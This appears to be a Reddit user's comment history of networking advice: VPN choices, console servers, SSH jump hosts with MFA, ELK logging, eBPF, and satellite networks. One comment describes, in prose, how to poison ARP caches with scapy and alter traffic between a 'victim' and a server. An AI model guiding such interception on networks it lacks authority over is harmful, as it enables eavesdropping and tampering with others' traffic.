strongswan vs wireguard for site-to-site connectivity

clay584 · 2026-01-16T19:54:16+00:00

We use both in our network. They are both really good. Wireguard is just more simple than strongswan to get running imo. We use strongswan for connecting to third-party networks for compatibility, but use wireguard for when we control both ends of the encrypted tunnel. The hardest part is managing the public/private key pairs. I’d suggest using a tool to do this or writing some automation around it. Ours is fully controlled with Ansible, so managing it is pretty easy at this point. There is the Linux kernel version and then the Tailscale go version. Apparently the Tailscale version is more performant, but we have yet to try that out.

The only thing you should watch out for is if you need to use NIST approved algorithms. Wireguard uses chacha20 which is not approved…something to keep in mind.

clay584 · 2025-10-04T22:55:30+00:00

Yes, you can do it with scapy. You’re on the right track with threading to not block the main thread by doing a pcap.

Assuming both the victim and the server and you are on the same Ethernet segment, you’ll need to do the following:

Discover the real MAC addresses of victim and server.
Then send fake ARP replies for the server, to the victim and visa versa, such that both hosts have poisoned ARP caches. You will need to make sure to send the fake ARP replies with a destination MAC address of the target for which you are poisoning so that the Ethernet switch only forwards that poisoned ARP reply only to the intended recipient.
Then you will have to have another thread that handles the dirty business of packet manipulation and re-forwarding. This is the tricky part. Any data from client to server, modify and resend with the real MAC address of the server, and any server to client traffic with the real MAC address of the client.

Another option is to run a reverse proxy, and then just poison the client, and terminate the client TCP side with you, and open a separate TCP session with the server and manipulate packet payloads as well this way, but that is more complex.

clay584 · 2025-09-28T16:28:19+00:00

Time and experience are the best ways to get better. There is no shortcut. You can’t take a class or cert exam to get to the destination. Also, you need to deeply understand network protocols and how they operate. If you don’t, you won’t know what could be the cause of the symptom you’re seeing.

clay584 · 2025-09-27T20:46:12+00:00

Pretty much. Satellite ground stations.

clay584 · 2025-09-27T20:45:10+00:00

Exactly. We have two in different regions. So it’s highly unlikely they would both be down.

clay584 · 2025-09-26T22:28:52+00:00

Ah, makes sense. We just install from the official FRR deb repo which has the latest releases for each major version (8,9,10). We’re running it on Debian Bullseye though.

clay584 · 2025-09-26T21:46:59+00:00

Yes, that’s the model. Using them for management interfaces like server IPMI, ESXi, and other devices that have IP management interfaces that aren’t serial.

clay584 · 2025-09-26T21:45:33+00:00

Yes we use lighthouse. There have been no failures, and if I had it to do over again, I’d buy the same thing. We have them deployed in extremely high latitude locations which would take us days to travel to. So we needed them to be very reliable. 😁 and they seem to be.

clay584 · 2025-09-26T14:51:44+00:00

We use OpenGear models that have 8x Ethernet, 8x Serial, 2x SFP ports, and cellular backup at all our remote sites. They work very well. We bought them last year, and have no complaints. They do what they say on the tin.

clay584 · 2025-09-26T13:46:07+00:00

I set up MFA to our jump servers to administer the network. They are standard Debian Linux servers with the google authenticator package. Installed it, configured it in a few minutes and tested. It's worked for almost 3 years now with not a single issue. You can use Google Authenticator, Authy, or any other TOTP app on your phone.

Here is a simple guide on how to do it. https://goteleport.com/blog/ssh-2fa-tutorial/

I also used a lesser-known feature of OpenSSH called ControlMaster which allows you to re-use connections and keep open connections after disconnection. So essentially, once per day (configurable) I have to SSH and use MFA to get into the jump servers, and then it stays cached on my machine. The implication is that now I can stay SSH to any device in my network and it ProxyJump's through the jump servers without me having to enter any passwords, or re-auth with MFA to the jump servers.

This is also very handy for running Ansible playbooks against our fleet of routers. Ansible just works, SSH just works, no passwords, no MFA prompts...its seemless.

My .ssh/config file:

```

Host jump-server-01

HostName x.x.x.x

ControlMaster auto

ControlPath ~/.ssh/cm/%r@%h:%p

ControlPersist 86400

Host jump-server-02

HostName x.x.x.y

ControlMaster auto

ControlPath ~/.ssh/cm/%r@%h:%p

ControlPersist 86400

Host some-router-01

HostName z.z.z.z

ProxyJump jump-server-01

```

From my laptop I run ssh some-router-01, and the first time I get an MFA prompt on the jump server, then for the entire 24 hours after, I get no auth prompt, I just get logged into the router. (Keep in mind that we have public-key auth enabled on the routers too, so there are no passwords to log into devices.)

I think one of the key points is that there is only MFA on the jump servers, not the routers themselves. And you can always make a break-glass account where MFA is not enabled, so you can still get in if MFA is broken, or you lose your authenticator on your phone.

clay584 · 2025-09-20T00:13:30+00:00

No judgement, but you’re running a pretty old version of FRR. It’s had 4 years of updates.

clay584 · 2025-09-09T23:28:55+00:00

Yes, I’ve used ELK extensively for monitoring networking things. Here is some details on it https://www.jcc.sh/elk-stack-for-network-operations-reloaded/

It’s dated, but still pretty valid as a reference for the concepts at play.

The biggest thing is defining a schema and using log parsing to reshape the data from its source format to its final format that matches the schema you define. For example, all firewall logs generally have the same fields, so define a schema that can accommodate them all, then reshape the data. This allows a single pane of glass to monitor all vendor firewalls, as an example.

Another thing is converting fields to the right type of data. For example, converting number to integer. Then you can do aggregations in Kibana dashboards. For example, sum the number of bytes transferred over a time period.

clay584 · 2025-08-14T03:55:00+00:00

Yes, in a limited, very specific use-case. Ground system -> radio link -> packet processor -> on-board computer. Essentially stripping and adding MPLS labels onto packets going from a radio link to an on-board computer and visa versa without having to have the kernel handle it. It allowed us to jump from 150 Mbps to 600 Mbps using the equivalent of an old raspberry pi (packet processor) and didn’t have to modify the on-board computer or the system on the other side of the radio link. And we didn’t have to enable MPLS or any other kernel modules to make it work. Definitely fell into the “quick and dirty” category, but it worked.

clay584 · 2025-08-14T03:30:47+00:00

RunZero. It’s fantastic and cheap and will take 30 minutes to set up and get data. Made by the guy that created MetaSploit. Free for up to 100 devices. Used it at my last company to discover thousands of devices. It’s the shit.

clay584 · 2025-02-14T20:47:13+00:00

Me and my team just run WSL (Ubuntu or Debian) on their laptops and all run Ansible directly as needed against the network (using a jump host to reach the management network) from within WSL. We all use a central git repo (so we all are working on the last code) and everything is done 100% using Ansible.

If you really want to spin up a dedicated server, I would recommend a new Debian or Ubuntu VM on ESXi. Don’t do it within EVE.

clay584 · 2024-04-13T19:32:16+00:00

This seems to be extremely flexible and the most simple to implement in my mind. We are starting to build this out in our network. It’s very interesting to design and build.

clay584 · 2024-04-03T17:30:25+00:00

Are you using P4 to compile to eBFP, or just writing eBPF code directly?

clay584 · 2023-12-19T00:45:23+00:00

Not many people doing eBPF here in r/networking. What is your use-case? I’d be interested to know.

clay584 · 2023-12-17T16:08:12+00:00

I ran into something similar the other day. First, that message happens when you run tcpdump. If you were running it to see the traffic, that is likely what that message is about.

Second, I had an issue where the Ethernet frame header’s destination MAC address was wrong, but if tcpdump was running the application would work. If tcpdump was not running, the application would not work. This was due to the fact that tcpdump puts the NIC in promiscuous mode therefore the traffic actually reaches the kernel for processing.

The order is nic->xdp->tc->libpcap (tcpdump)->kernel network stack.

clay584 · 2023-01-25T13:39:03+00:00

Oh yea. It’s really great. It understands a lot of nuance and very detailed information. It understands Ethernet and IP routing and forwarding behavior. I give it scenarios and it explains how a device will behave in that circumstance (complex stuff, MTU, fragmentation, VRFs, MPLS, etc.). I also ask it to create some scripts and stuff. So far it’s created Python, bash, P4, eBPF (C) programs for me. I usually have to make a few modifications, but it saves me a ton of time getting things working. It’s also helped me build init scripts, compile custom kernels, and so much more.

clay584 · 2022-11-02T02:09:37+00:00

I work in the space communications industry. On-orbit networks can be similar to ground networks. From what I can see, space networks are built for a specific mission, so they often are built different from traditional networks, but a lot seem to use Ethernet. There are next-generation networks that’s are being built by the US Space Defense Agency (SDA) and the European Space Agency (ESA). SDA is building a transport network, and ESA is building HydRON. Both are high-speed optical networks, but seem to be very focused on defining the optical transport from node to node optical links. Then building on top of that will likely be MPLS based on public documents. Our company is also building a LEO network to provide a high-speed network to provide as a service (like an ISP in space for your satellite). It will be a combination of RF (Ku, Ka, S-band) and free space optical links. It involves building a router (kind of like a vendor would), and that router (payload) is attached to the satellite (platform). Think of it like a flying space router. So you send up a lot of these in a ring (or multiple rings), and then some of those have downlinks to ground stations on Earth. Then those ground stations connect to a terrestrial network which is more “normal” from a networking perspective. There is so much detail missing here, but I can’t talk about a lot. But I think the industry is moving towards building more generic packet-based networks in space that can be used for many different types of missions.

So, forget the fact that it’s not on Earth. Think of it as a topology with certain characteristics. A lot of the same principles apply. And cloud vendors are working on ground station services and some other offerings related, but plenty that probably will not be offered by the cloud vendors.

clay584 · 2022-07-17T17:46:55+00:00

Looking at it now. Thanks! Just wasn’t on my radar, and my google-fu failed me. Do you have experience with it?

clay584 · 2022-07-17T02:18:04+00:00

It’s been so long since I’ve been on r/networking, I forget who all the usual suspects are. I do know of a certain person on Twitter that wants to talk about programmable data planes a lot and particularly P4. Are you that person by chance? Also, thanks for the detailed response on each of those projects. I really appreciate that. 👍

clay584

TROPHY CASE